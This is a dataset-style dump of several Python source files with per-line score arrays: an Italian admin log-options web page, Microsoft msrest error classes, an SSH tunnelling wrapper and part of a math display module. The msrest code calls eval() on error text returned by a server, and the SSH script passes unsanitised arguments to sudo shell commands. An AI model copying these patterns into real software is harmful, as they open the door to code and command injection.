0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01098901098901099, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.045454545454545456, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.008333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02857142857142857, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.010416666666666666, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.013888888888888888, 0, 0, 0, 0.010416666666666666, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.010869565217391304, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.00641025641025641, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.014925373134328358, 0, 0, 0 ]
905
0.000306
false
# -*- coding: utf-8 -*- """ Controller della pagina web per la gestione delle opzioni di admin. """ #= IMPORT ====================================================================== import string from src.element import Flags from src.enums import LOG, TRUST from src.web_resource import (WebResource, create_form_row, create_form, create_checklist_of_flags, set_checked_flags) #= CLASSI ====================================================================== class AdminAccountPage(WebResource): TITLE = "Admin Account" ACCOUNT_MUST_EXIST_IN_GET = True ACCOUNT_MUST_EXIST_IN_POST = True MINIMUM_TRUST_ON_GET = TRUST.MASTER MINIMUM_TRUST_ON_POST = TRUST.MASTER def render_GET(self, request, conn): return self.create_page(request, conn) #- Fine Metodo - def render_POST(self, request, conn): if "show_logs" in request.args: set_checked_flags(request, "show_logs", conn.account.show_logs) return self.create_page(request, conn) else: # Capita quando vengono disabilitate tutte le checkbox conn.account.show_logs = Flags(LOG.NONE) return self.create_page(request, conn) #- Fine Metodo - def create_page(self, request, conn): # Prepara il form delle opzioni form_show_logs = [] row = create_form_row(form_show_logs) row.label = "Log Visualizzati" row.field = self.create_checklist_of_logs(conn) row = create_form_row(form_show_logs) row.label = '''<input type="submit" value="Salva" onclick="document.getElementById('form_show_logs').submit();" />''' if request.method == "POST" and "show_logs" in request.args: row.label += ''' <span style="color:green">Opzioni salvate.</span>''' page = "<br>" page += create_form(form_show_logs, "form_show_logs", "admin_account.html", "Scegli i log da visualizzare", show_label=False) page += "<br>" return page #- Fine Metodo - def create_checklist_of_logs(self, conn): """ Concettualmente questa è un override della funzione create_checklist_of_flags in web.py. """ page = '''<table>''' for log_element in LOG.elements: if not log_element.is_checkable: continue if conn.account.trust < log_element.trust: continue checked = "" if log_element in conn.account.show_logs: checked = ''' checked="checked"''' page += ''' <tr><td nowrap><input type="checkbox" name="%s" value="%s"%s /> %s</td><td>%s</td></tr>''' % ( "show_logs", log_element.code, checked, log_element, log_element.description) page += '''</table>''' return page #- Fine Metodo -
[ "# -*- coding: utf-8 -*-\n", "\n", "\"\"\"\n", "Controller della pagina web per la gestione delle opzioni di admin.\n", "\"\"\"\n", "\n", "\n", "#= IMPORT ======================================================================\n", "\n", "import string\n", "\n", "from src.element import Flags\n", "from src.enums import LOG, TRUST\n", "from src.web_resource import (WebResource, create_form_row, create_form,\n", " create_checklist_of_flags, set_checked_flags)\n", "\n", "\n", "#= CLASSI ======================================================================\n", "\n", "class AdminAccountPage(WebResource):\n", " TITLE = \"Admin Account\"\n", "\n", " ACCOUNT_MUST_EXIST_IN_GET = True\n", " ACCOUNT_MUST_EXIST_IN_POST = True\n", "\n", " MINIMUM_TRUST_ON_GET = TRUST.MASTER\n", " MINIMUM_TRUST_ON_POST = TRUST.MASTER\n", "\n", " def render_GET(self, request, conn):\n", " return self.create_page(request, conn)\n", " #- Fine Metodo -\n", "\n", " def render_POST(self, request, conn):\n", " if \"show_logs\" in request.args:\n", " set_checked_flags(request, \"show_logs\", conn.account.show_logs)\n", " return self.create_page(request, conn)\n", " else:\n", " # Capita quando vengono disabilitate tutte le checkbox\n", " conn.account.show_logs = Flags(LOG.NONE)\n", " return self.create_page(request, conn)\n", " #- Fine Metodo -\n", "\n", " def create_page(self, request, conn):\n", " # Prepara il form delle opzioni\n", " form_show_logs = []\n", " row = create_form_row(form_show_logs)\n", " row.label = \"Log Visualizzati\"\n", " row.field = self.create_checklist_of_logs(conn)\n", " row = create_form_row(form_show_logs)\n", " row.label = '''<input type=\"submit\" value=\"Salva\" onclick=\"document.getElementById('form_show_logs').submit();\" />'''\n", " if request.method == \"POST\" and \"show_logs\" in request.args:\n", " row.label += ''' <span style=\"color:green\">Opzioni salvate.</span>'''\n", "\n", " page = \"<br>\"\n", " page += create_form(form_show_logs, \"form_show_logs\", \"admin_account.html\", \"Scegli i log da visualizzare\", show_label=False)\n", " page += \"<br>\"\n", "\n", " return page\n", " #- Fine Metodo -\n", "\n", " def create_checklist_of_logs(self, conn):\n", " \"\"\"\n", " Concettualmente questa è un override della funzione create_checklist_of_flags\n", " in web.py.\n", " \"\"\"\n", " page = '''<table>'''\n", " for log_element in LOG.elements:\n", " if not log_element.is_checkable:\n", " continue\n", " if conn.account.trust < log_element.trust:\n", " continue\n", " checked = \"\"\n", " if log_element in conn.account.show_logs:\n", " checked = ''' checked=\"checked\"'''\n", " page += ''' <tr><td nowrap><input type=\"checkbox\" name=\"%s\" value=\"%s\"%s /> %s</td><td>%s</td></tr>''' % (\n", " \"show_logs\", log_element.code, checked, log_element, log_element.description)\n", " page += '''</table>'''\n", "\n", " return page\n", " #- Fine Metodo -\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0.024691358024691357, 0, 0, 0, 0.02857142857142857, 0.025, 0, 0, 0, 0, 0.024691358024691357, 0, 0, 0, 0, 0.02631578947368421, 0, 0, 0.02040816326530612, 0.02040816326530612, 0, 0, 0, 0.047619047619047616, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0, 0, 0, 0, 0, 0, 0, 0, 0.007936507936507936, 0, 0.012195121951219513, 0, 0.043478260869565216, 0.007462686567164179, 0, 0, 0, 0.047619047619047616, 0, 0, 0, 0.011627906976744186, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.008333333333333333, 0.010638297872340425, 0, 0, 0, 0.047619047619047616 ]
80
0.005778
false
# -------------------------------------------------------------------------- # # Copyright (c) Microsoft Corporation. All rights reserved. # # The MIT License (MIT) # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the ""Software""), to # deal in the Software without restriction, including without limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or # sell copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. # # -------------------------------------------------------------------------- from requests import RequestException from msrest.exceptions import ClientException from msrest.serialization import Deserializer from msrest.exceptions import DeserializationError class CloudErrorData(object): """Cloud Error Data object, deserialized from error data returned during a failed REST API call. """ _validation = {} _attribute_map = { 'error': {'key': 'code', 'type': 'str'}, 'message': {'key': 'message', 'type': 'str'}, 'data': {'key': 'values', 'type': '{str}'} } def __init__(self, *args, **kwargs): self.error = None self._message = None self.request_id = None self.error_time = None self.data = None super(CloudErrorData, self).__init__(*args) def __str__(self): """Cloud error message.""" return str(self._message) @classmethod def _get_subtype_map(cls): return {} @property def message(self): """Cloud error message.""" return self._message @message.setter def message(self, value): """Attempt to deconstruct error message to retrieve further error data. """ try: value = eval(value) except (SyntaxError, TypeError): pass try: value = value.get('value', value) msg_data = value.split('\n') self._message = msg_data[0] except AttributeError: self._message = value return try: self.request_id = msg_data[1].partition(':')[2] time_str = msg_data[2].partition(':') self.error_time = Deserializer.deserialize_iso( "".join(time_str[2:])) except (IndexError, DeserializationError): pass class CloudError(ClientException): """ClientError, exception raised for failed Azure REST call. Will attempt to deserialize response into meaningful error data. :param requests.Response response: Response object. :param str error: Optional error message. """ def __init__(self, response, error=None, *args): deserialize = Deserializer() self.error = None self.message = None self.response = response self.status_code = self.response.status_code self.request_id = None if error: self.message = error self.error = response else: try: data = response.json() except ValueError: data = response else: data = data.get('error', data) try: self.error = deserialize(CloudErrorData(), data) except DeserializationError: self.error = None try: self.message = self.error.message except AttributeError: self.message = None if not self.error or not self.message: try: content = response.json() except ValueError: server_message = "none" else: server_message = content.get('message', "none") try: response.raise_for_status() except RequestException as err: if not self.error: self.error = err if not self.message: if server_message == "none": server_message = str(err) msg = "Operation failed with status: {!r}. Details: {}" self.message = msg.format(response.reason, server_message) else: if not self.error: self.error = response if not self.message: msg = "Operation failed with status: {!r}. Details: {}" self.message = msg.format( response.status_code, server_message) super(CloudError, self).__init__(self.message, self.error, *args) def __str__(self): """Cloud error message""" return str(self.message)
[ "# --------------------------------------------------------------------------\n", "#\n", "# Copyright (c) Microsoft Corporation. All rights reserved.\n", "#\n", "# The MIT License (MIT)\n", "#\n", "# Permission is hereby granted, free of charge, to any person obtaining a copy\n", "# of this software and associated documentation files (the \"\"Software\"\"), to\n", "# deal in the Software without restriction, including without limitation the\n", "# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n", "# sell copies of the Software, and to permit persons to whom the Software is\n", "# furnished to do so, subject to the following conditions:\n", "#\n", "# The above copyright notice and this permission notice shall be included in\n", "# all copies or substantial portions of the Software.\n", "#\n", "# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n", "# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n", "# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n", "# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n", "# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n", "# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n", "# IN THE SOFTWARE.\n", "#\n", "# --------------------------------------------------------------------------\n", "\n", "from requests import RequestException\n", "\n", "from msrest.exceptions import ClientException\n", "from msrest.serialization import Deserializer\n", "from msrest.exceptions import DeserializationError\n", "\n", "\n", "class CloudErrorData(object):\n", " \"\"\"Cloud Error Data object, deserialized from error data returned\n", " during a failed REST API call.\n", " \"\"\"\n", "\n", " _validation = {}\n", " _attribute_map = {\n", " 'error': {'key': 'code', 'type': 'str'},\n", " 'message': {'key': 'message', 'type': 'str'},\n", " 'data': {'key': 'values', 'type': '{str}'}\n", " }\n", "\n", " def __init__(self, *args, **kwargs):\n", " self.error = None\n", " self._message = None\n", " self.request_id = None\n", " self.error_time = None\n", " self.data = None\n", " super(CloudErrorData, self).__init__(*args)\n", "\n", " def __str__(self):\n", " \"\"\"Cloud error message.\"\"\"\n", " return str(self._message)\n", "\n", " @classmethod\n", " def _get_subtype_map(cls):\n", " return {}\n", "\n", " @property\n", " def message(self):\n", " \"\"\"Cloud error message.\"\"\"\n", " return self._message\n", "\n", " @message.setter\n", " def message(self, value):\n", " \"\"\"Attempt to deconstruct error message to retrieve further\n", " error data.\n", " \"\"\"\n", " try:\n", " value = eval(value)\n", " except (SyntaxError, TypeError):\n", " pass\n", " try:\n", " value = value.get('value', value)\n", " msg_data = value.split('\\n')\n", " self._message = msg_data[0]\n", " except AttributeError:\n", " self._message = value\n", " return\n", " try:\n", " self.request_id = msg_data[1].partition(':')[2]\n", " time_str = msg_data[2].partition(':')\n", " self.error_time = Deserializer.deserialize_iso(\n", " \"\".join(time_str[2:]))\n", " except (IndexError, DeserializationError):\n", " pass\n", "\n", "\n", "class CloudError(ClientException):\n", " \"\"\"ClientError, exception raised for failed Azure REST call.\n", " Will attempt to deserialize response into meaningful error\n", " data.\n", "\n", " :param requests.Response response: Response object.\n", " :param str error: Optional error message.\n", " \"\"\"\n", "\n", " def __init__(self, response, error=None, *args):\n", " deserialize = Deserializer()\n", " self.error = None\n", " self.message = None\n", " self.response = response\n", " self.status_code = self.response.status_code\n", " self.request_id = None\n", "\n", " if error:\n", " self.message = error\n", " self.error = response\n", " else:\n", " try:\n", " data = response.json()\n", " except ValueError:\n", " data = response\n", " else:\n", " data = data.get('error', data)\n", " try:\n", " self.error = deserialize(CloudErrorData(), data)\n", " except DeserializationError:\n", " self.error = None\n", " try:\n", " self.message = self.error.message\n", " except AttributeError:\n", " self.message = None\n", "\n", " if not self.error or not self.message:\n", " try:\n", " content = response.json()\n", " except ValueError:\n", " server_message = \"none\"\n", " else:\n", " server_message = content.get('message', \"none\")\n", " try:\n", " response.raise_for_status()\n", " except RequestException as err:\n", " if not self.error:\n", " self.error = err\n", " if not self.message:\n", " if server_message == \"none\":\n", " server_message = str(err)\n", " msg = \"Operation failed with status: {!r}. Details: {}\"\n", " self.message = msg.format(response.reason, server_message)\n", " else:\n", " if not self.error:\n", " self.error = response\n", " if not self.message:\n", " msg = \"Operation failed with status: {!r}. Details: {}\"\n", " self.message = msg.format(\n", " response.status_code, server_message)\n", "\n", " super(CloudError, self).__init__(self.message, self.error, *args)\n", "\n", " def __str__(self):\n", " \"\"\"Cloud error message\"\"\"\n", " return str(self.message)\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
157
0
false
#!/usr/bin/python # -*- coding: utf8 -*- # (c) Fábio Rodrigues Ribeiro - http://farribeiro.blogspot.com # Copying and distribution of this file, with or without modification, are permitted # in any medium without royalty provided the copyright notice and this notice are # preserved. This file is offered as-is, without any warranty. # Este script tem objetivo de simplificar os comandos do SSH # Opções usadas no ssh # -C Compactação # -L ligacao em um host e porta atrás do SSH # -N não executa comandos import os import sys class shpy: # host = None # alvo = None # gateway = None porta_localhost = "5000" default_cmd = "sudo ssh -fCN" def dynamic_bridge(self, host): os.system(self.default_cmd+"D " + self.porta_localhost + " " + host) print "Configure seu navegador para usar sockets no endereço 127.0.0.1:" +self.porta_localhost def forward(self, gateway, alvo): # alvo = sys.argv[4] # sintaxe 0.0.0.0:0000 os.system(self.default_cmd+"L "+ self.porta_localhost +":"+ alvo + " " + gateway) print "Apontar aplicativo para 127.0.0.1:"+self.porta_localhost # def reverse(self, host): # os.system(self.default_cmd+"R "+host) def kill(self): os.system("sudo killall ssh") print "Matando processo... ok" def rsync_cp(self, caminho_host, caminho): os.system("sudo rsync -avz "+ caminho +" -e ssh://"+caminho_host) # rsync -avz /home -e ssh://user@0.0.0.0:/path def argumentos(self): print "Faltando argumentos" def __init__(self): opcao = sys.argv[1] if(opcao == "dbg"): # if (sys.argv[1] or sys.argv[2] == None): # self.argumentos() # else: self.dynamic_bridge(sys.argv[2]) elif(opcao == "frw"): self.forward(sys.argv[2], sys.argv[3]) elif(opcao == "sh"): os.system("sudo ssh -C "+sys.argv[2]) # elif(opcao == "rev"): # self.reverse(sys.argv[2]) elif (opcao == "kill"): self.kill() elif (opcao == "cp"): self.rsync_cp(sys.argv[2], sys.argv[3]) else: print "\ Sintaxe: shg.py [option] <host> \n\n\ Options:\n\ --------\n\ dbg\t\tDynamic bridge\n\ frw\t\tTuneling and forwarding\n\ kill\t\tKill the all ssh process\n\ Any option\tPrint this help\n\n\ Enjoy with the tool!" #rev\t\tReverse tuneling\n\ s = shpy()
[ "#!/usr/bin/python\n", "# -*- coding: utf8 -*-\n", "\n", "# (c) Fábio Rodrigues Ribeiro - http://farribeiro.blogspot.com\n", "\n", "# Copying and distribution of this file, with or without modification, are permitted\n", "# in any medium without royalty provided the copyright notice and this notice are\n", "# preserved. This file is offered as-is, without any warranty.\n", "\n", "# Este script tem objetivo de simplificar os comandos do SSH\n", "# Opções usadas no ssh\n", "# -C Compactação\n", "# -L ligacao em um host e porta atrás do SSH\n", "# -N não executa comandos\n", "\n", "import os\n", "import sys\n", "\n", "class shpy:\n", "\t# host = None\n", "\t# alvo = None\n", "\t# gateway = None\n", "\n", "\tporta_localhost = \"5000\"\n", "\tdefault_cmd = \"sudo ssh -fCN\"\n", "\n", "\tdef dynamic_bridge(self, host):\n", "\t\tos.system(self.default_cmd+\"D \" + self.porta_localhost + \" \" + host)\n", "\t\tprint \"Configure seu navegador para usar sockets no endereço 127.0.0.1:\" +self.porta_localhost\n", "\n", "\tdef forward(self, gateway, alvo):\n", "\t\t# alvo = sys.argv[4] # sintaxe 0.0.0.0:0000\n", "\t\tos.system(self.default_cmd+\"L \"+ self.porta_localhost +\":\"+ alvo + \" \" + gateway)\n", "\t\tprint \"Apontar aplicativo para 127.0.0.1:\"+self.porta_localhost\n", "\n", "\t# def reverse(self, host):\n", "\t\t# os.system(self.default_cmd+\"R \"+host)\n", "\n", "\tdef kill(self):\n", "\t\tos.system(\"sudo killall ssh\")\n", "\t\tprint \"Matando processo... ok\"\n", "\n", "\tdef rsync_cp(self, caminho_host, caminho):\n", "\t\tos.system(\"sudo rsync -avz \"+ caminho +\" -e ssh://\"+caminho_host) # rsync -avz /home -e ssh://user@0.0.0.0:/path\n", "\n", "\tdef argumentos(self):\n", "\t\tprint \"Faltando argumentos\"\n", "\n", "\tdef __init__(self):\n", "\t\topcao = sys.argv[1]\n", "\n", "\t\tif(opcao == \"dbg\"):\n", "\t\t\t# if (sys.argv[1] or sys.argv[2] == None):\n", "\t\t\t\t# self.argumentos()\n", "\t\t\t# else:\n", "\t\t\tself.dynamic_bridge(sys.argv[2])\n", "\t\telif(opcao == \"frw\"):\n", "\t\t\tself.forward(sys.argv[2], sys.argv[3])\n", "\t\telif(opcao == \"sh\"):\n", "\t\t\tos.system(\"sudo ssh -C \"+sys.argv[2])\n", "\t\t# elif(opcao == \"rev\"):\n", "\t\t\t# self.reverse(sys.argv[2])\n", "\t\telif (opcao == \"kill\"):\n", "\t\t\tself.kill()\n", "\t\telif (opcao == \"cp\"):\n", "\t\t\tself.rsync_cp(sys.argv[2], sys.argv[3])\n", "\t\telse:\n", "\t\t\tprint \"\\\n", "Sintaxe: shg.py [option] <host> \\n\\n\\\n", "Options:\\n\\\n", "--------\\n\\\n", "dbg\\t\\tDynamic bridge\\n\\\n", "frw\\t\\tTuneling and forwarding\\n\\\n", "kill\\t\\tKill the all ssh process\\n\\\n", "Any option\\tPrint this help\\n\\n\\\n", "Enjoy with the tool!\"\n", "#rev\\t\\tReverse tuneling\\n\\\n", "\n", "s = shpy()\n" ]
[ 0, 0, 0, 0, 0, 0.011764705882352941, 0.012195121951219513, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.08333333333333333, 0.06666666666666667, 0.06666666666666667, 0.05555555555555555, 0, 0.038461538461538464, 0.03225806451612903, 0, 0.030303030303030304, 0.014084507042253521, 0.030927835051546393, 0, 0.02857142857142857, 0.021739130434782608, 0.05952380952380952, 0.015151515151515152, 0, 0.03571428571428571, 0.023809523809523808, 0, 0.058823529411764705, 0.03125, 0.030303030303030304, 0, 0.022727272727272728, 0.043478260869565216, 0, 0.043478260869565216, 0.03333333333333333, 0, 0.047619047619047616, 0.045454545454545456, 0, 0.045454545454545456, 0.021739130434782608, 0.08333333333333333, 0.09090909090909091, 0.027777777777777776, 0.041666666666666664, 0.023809523809523808, 0.043478260869565216, 0.024390243902439025, 0.038461538461538464, 0.03225806451612903, 0.038461538461538464, 0.06666666666666667, 0.041666666666666664, 0.023255813953488372, 0.125, 0.08333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0, 0.09090909090909091 ]
79
0.024829
false
# -*- coding: utf-8 -*- # IMPORTANT CONFIGURE YOUR TEXT EDITOR/IDE TO utf-8 !!! # @author: "Evert Provoost" # @nickname: "ElecProg" # @pack: "Math Processing Layer (MPL)" # @part: "Visualization system (MPL.V)" # @version: "v5.0.0" # @license: "GNU General Public License v3" from fractions import Fraction from decimal import getcontext, Decimal from .dms import dms as _dms import math import time class dms( _dms): # We would otherwise get a looping import, searching for a fix def str(self, local="all", dec="inf", acc=False, denom=10000, maxCompT=1): deg = visual(self.data[0], local, {'dec': dec, 'acc': acc, 'todms': False}, denom, maxCompT / 3) mnt = visual(self.data[1], local, {'dec': dec, 'acc': acc, 'todms': False}, denom, maxCompT / 3) sec = visual(self.data[2], local, {'dec': dec, 'acc': acc, 'todms': False}, denom, maxCompT / 3) # Yes float since we don't need any precision here. try: if float(deg.replace(',', '.')) < 0: raise ValueError() except ValueError: deg = '(' + deg + ')' try: if float(mnt.replace(',', '.')) < 0: raise ValueError() except ValueError: mnt = '(' + mnt + ')' try: if float(sec.replace(',', '.')) < 0: raise ValueError() except ValueError: sec = '(' + sec + ')' if deg == "0" and mnt == "0" and sec == "0": return "0" + "°" else: outp = "" if not deg == "0": outp = outp + deg + "°" if not mnt == "0": outp = outp + mnt + "'" if not sec == "0": outp = outp + sec + '"' return outp def Pi(): getcontext().prec += 2 lasts, t, s, n, na, d, da = 0, Decimal(3), 3, 1, 0, 0, 24 while s != lasts: lasts = s n, na = n + na, na + 8 d, da = d + da, da + 32 t = (t * n) / d s += t getcontext().prec -= 2 return +s def Tau(): return 2 * Pi() def Phi(): return +((1 + Decimal(5).sqrt()) / 2) def E(): getcontext().prec += 2 i, lasts, s, fact, num = 0, 0, 1, Decimal(1), 1 while s != lasts: lasts = s i += 1 fact *= i s += num / fact getcontext().prec -= 2 return +s def visual(arg, local="all", opt={'dec': 'inf', 'acc': False, 'todms': False}, denom=10000, maxCompT=1): quantizefactor = 10**Decimal(-22) if isinstance(arg, bool): return str(arg) elif opt['todms']: return dms(arg).str(local, opt['dec'], denom) elif isinstance(arg, int): return str(arg) arg = Decimal(str(arg)) if arg.is_nan(): return "NaN" elif arg == Decimal("Infinity"): return "+Inf" elif arg == Decimal("-Infinity"): return "-Inf" if not opt['dec'] == "inf" and not opt['acc']: tmp = arg.quantize(10**Decimal(-opt['dec'])) if not math.isnan(tmp): arg = tmp else: # The number is not NaN so it's too big arg = str(arg) arg, exponent = tuple(arg.split('E')) arg = Decimal(arg).quantize(10**Decimal(-opt['dec'])) arg = str(arg) + "E" + exponent elif opt['acc'] and arg < (denom / 100)**3: if Decimal(arg.to_integral_exact()) == arg.quantize(quantizefactor): return str(arg.to_integral_exact()) frac = Fraction(arg).limit_denominator(int(denom)) if (Decimal(frac.numerator) / Decimal(frac.denominator)).quantize( quantizefactor) == arg.quantize(quantizefactor): return str(frac) deno = 1 dent = 1 lst = [] prefix = "" if arg.is_signed(): arg = abs(arg) prefix = "-" pi = Pi() tau = Tau() phi = Phi() e = E() startTime = time.time() while deno <= denom / 100: if time.time() - startTime > maxCompT: break while dent <= denom / 100: frqtn = Decimal(dent) / Decimal(deno) if frqtn not in lst: lst.append(frqtn) argsqr = (arg / frqtn)**2 argcub = (arg / frqtn)**3 argpi = (arg / frqtn) / pi argtau = (arg / frqtn) / tau arge = (arg / frqtn) / e argphi = (arg / frqtn) / phi if argpi.quantize(quantizefactor) == 1: if frqtn == 1: return prefix + "pi" elif frqtn == 2: return prefix + "tau" else: frac = Fraction(frqtn).limit_denominator( int(denom)) if frac.numerator == 1: return str( prefix + "pi/" + str(frac.denominator)) elif frac.denominator == 1: return str(prefix + str(frac.numerator) + "pi") else: return str(prefix + str(frac.numerator) + "pi/" + str(frac.denominator)) if argtau.quantize(quantizefactor) == 1: if frqtn == 1: return prefix + "tau" else: frac = Fraction(frqtn).limit_denominator( int(denom)) if frac.numerator == 1: return str( prefix + "tau/" + str(frac.denominator)) elif frac.denominator == 1: return str( prefix + str(frac.numerator) + "tau") else: return str(prefix + str(frac.numerator) + "tau/" + str(frac.denominator)) elif arge.quantize(quantizefactor) == 1: if frqtn == 1: return prefix + "e" else: frac = Fraction(frqtn).limit_denominator( int(denom)) if frac.numerator == 1: return str( prefix + "e/" + str(frac.denominator)) elif frac.denominator == 1: return str(prefix + str(frac.numerator) + "e") else: return str(prefix + str(frac.numerator) + "e/" + str(frac.denominator)) elif argphi.quantize(quantizefactor) == 1: if frqtn == 1: return prefix + "phi" else: frac = Fraction(frqtn).limit_denominator( int(denom)) if frac.numerator == 1: return str( prefix + "phi/" + str(frac.denominator)) elif frac.denominator == 1: return str( prefix + str(frac.numerator) + "phi") else: return str(prefix + str(frac.numerator) + "phi/" + str(frac.denominator)) elif Decimal( argsqr.to_integral_exact()) == argsqr.quantize( quantizefactor): outside_root = 1 inside_root = Decimal(argsqr.to_integral_exact()) d = 2 while (d**2 <= inside_root): if (inside_root % (d**2) == 0): inside_root = inside_root / (d**2) outside_root = outside_root * d else: d = d + 1 outside_root *= frqtn if inside_root == 1: return prefix + str( Fraction(outside_root).limit_denominator( int(denom))) elif outside_root == 1: return ( prefix + "v" + str(argsqr.to_integral_exact())) elif outside_root == 0 or inside_root == 0: return ("0") else: return (prefix + str( Fraction(outside_root).limit_denominator( int(denom))) + "*v" + str(inside_root.to_integral_exact())) elif Decimal( argcub.to_integral_exact()) == argcub.quantize( quantizefactor): outside_root = 1 inside_root = Decimal(argcub.to_integral_exact()) d = 2 while (d**3 <= inside_root): if (inside_root % (d**3) == 0): inside_root = inside_root / (d**3) outside_root = outside_root * d else: d = d + 1 outside_root *= frqtn if inside_root == 1: return prefix + str( Fraction(outside_root).limit_denominator( int(denom))) elif outside_root == 1: return (prefix + "³v" + str(argcub.to_integral_exact())) elif outside_root == 0 or inside_root == 0: return ("0") else: return (prefix + str( Fraction(outside_root).limit_denominator( int(denom))) + "*³v" + str(int(inside_root))) dent += 1 dent = 1 deno += 1 if not opt['dec'] == "inf": arg = Decimal(str(arg)).quantize(10**Decimal(-opt['dec'])) if prefix == "-": arg = -arg arg = str(arg) arg = arg.rstrip('0').rstrip('.') if '.' in arg else arg if local == "all" or local == "met": arg = 